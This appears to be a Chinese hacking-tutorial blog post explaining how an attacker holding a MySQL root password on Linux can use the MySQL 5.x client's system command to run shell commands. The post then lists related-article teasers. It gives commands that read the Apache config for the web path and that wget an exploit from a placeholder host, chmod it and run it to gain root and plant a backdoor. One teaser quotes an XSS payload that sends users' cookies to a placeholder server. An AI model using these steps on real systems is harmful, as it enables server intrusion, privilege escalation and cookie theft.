取得mysql的root密码不需要再找web路径
刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是按照我的的方法,没有必要再去找web路径了,直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行,搞到root权限,然后装后门虾米的
mysql>system wget http://xxxx.xxx.com/xxxx
mysql>system chmod x xxxx;
mysql>system ./xxxx;
mysql>system wget http://xxxx.xxx.com/xxxx mysql>system chmod x xxxx;mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。
或者,直接提权之后,下载后门安装,这个就留给大家去研究了。
Author: Sh@dow
网马是什么?怎么保护网马的代码?
网页木马实际上是一个HTML网页,它利用IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马。网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。网马
详情2018-01-16 12:21:40责编:llp 来源:驱动管家netxray怎么用?netxray的十大使用说明
NetXRay是由Cinco Networks公司开发的一个用于高级分组检错的软件,功能很强大。IP地址查询工具。标题:NetXray使用说明之(1)启动Capture,进入Capture Setting,选择Profiles-->New,以Default为模板,起名叫p
详情2018-01-20 08:56:22责编:llp 来源:驱动管家asp.net 教程 网站asp.net的一般防御方法
一般防御(以下方法还没办法禁用Process、RegShell,经了解星外虚拟主机管理系统也没有禁掉)1、禁止跨站、Services(4也可行)为每个网站新建一个系统用户如web_xxx,只属于Guests组、IIS_WPG组。新建网站文件夹xx
详情2018-01-18 18:05:47责编:llp 来源:驱动管家u盘启动盘制作工具有风险 盗版软件多且可能带病毒
一、概述1 盗版软件用户和“APT攻击”我国电脑用户当中,使用盗版软件是非常普遍的现象,从盗版的Windows系统到各种收费软件的“破解版”等等。互联网上也充斥着各种帮助用户使用盗版的“激活工具”、“破解工具
详情2018-01-18 14:39:47责编:llp 来源:驱动管家什么是phpddos流量攻击?phpddos流量攻击怎么处理?
这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽带
详情2018-01-24 18:05:55责编:llp 来源:驱动管家虚拟桌面是什么?传统桌面和虚拟桌面的区别
桌面就是您在屏幕上看到的所有内容。通常来讲,Windows只有一个桌面,如果你打开非常多的窗口,桌面就会显得纵横交错,杂乱无章,所以你需要更多的桌面。 试想一下,您在你的电脑上接上许多的显示器,这样您或许
详情2018-01-23 20:05:48责编:llp 来源:驱动管家网页病毒入侵windows系统有哪些途径?
网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。比如,当你收到一封主题为“I Love You”的邮件,兴冲冲的双击附件想欣赏一下这封“情书”的时候,却在无意当中成为了病毒的受害者和传播者
详情2018-01-13 16:51:16责编:llp 来源:驱动管家fastnetmon:一个多种抓包引擎分析ddos攻击工具
Fastnetmon,这是一个基于多种抓包引擎(NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP)的DoS DDoS攻击高效分析工具,可以探测和分析网络中的异常流量情况,同时可以通过外部脚本通知或阻断攻击。特性可处
详情2018-02-13 10:10:43责编:llp 来源:驱动管家校内网漏洞 校内网存在xss漏洞
校内网在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码javascript:window location href=& 39;http: www xxx com test php?cookie=& 39;
详情2018-01-26 16:25:17责编:llp 来源:驱动管家网警演讲以ddos为题 讲述一些奇葩ddos案件
江苏省公安厅网安总队科长童瀛在乌云 2015 白帽子大会上以 DDoS 为题演讲新型网络犯罪、新的应用方法层出不穷,「当网警这 5 年,太挑战了」。于是网警叔叔回忆起了这些年经历过的奇葩 DDoS 攻击案例,哭
详情2018-02-05 10:00:44责编:llp 来源:驱动管家
- 有道云笔记的协作功能是什么意思?有道云笔记协作功能怎么使用?
- pptv网络电视怎么设置自动关机?pptv网络电视设置在哪儿?
- 【游戏问题】游戏结束返回大厅卡死怎么办?游戏卡死解决方法
- 电脑桌面的本地连接ip地址可以设置吗?本地连接ip地址设置方法
- 如何设置开机密码?xp系统电脑设置开机密码的方法
- 电脑提示“音频服务未运行”怎么办?要如何解决
- 电脑开机后没反应是怎么回事?如何解决
- 什么是正向连接木马?什么是反弹连接木马?
- 可以单独禁用某一个驱动吗?win8怎么禁用指定的驱动?
- 打印机能不能彻底卸载?XP系统电脑彻底卸载打印机驱动的方法步骤
- qq农场图标是怎么点亮的?qq农场点亮图标的步骤
- skype是一款什么样的软件?skype注册账号的流程是什么?
- A站复活有望了?域名成功续费大量发布招聘信息
- win10补丁kb3119142经常重复安装的问题怎么解决
- 电脑默认的web浏览器在设置在找不到edge选项怎么解决
- 通过oracle注入直接取得主机cmdshell的方法
- 按键精灵脚本是什么?按键精灵脚本有什么用?
- 微博的二维码名片在哪儿生成?生成微博二维码名片的方法?
- tenda路由器怎么设置电脑拨号上网
- tracert命令的功能都有哪些?tracert命令介绍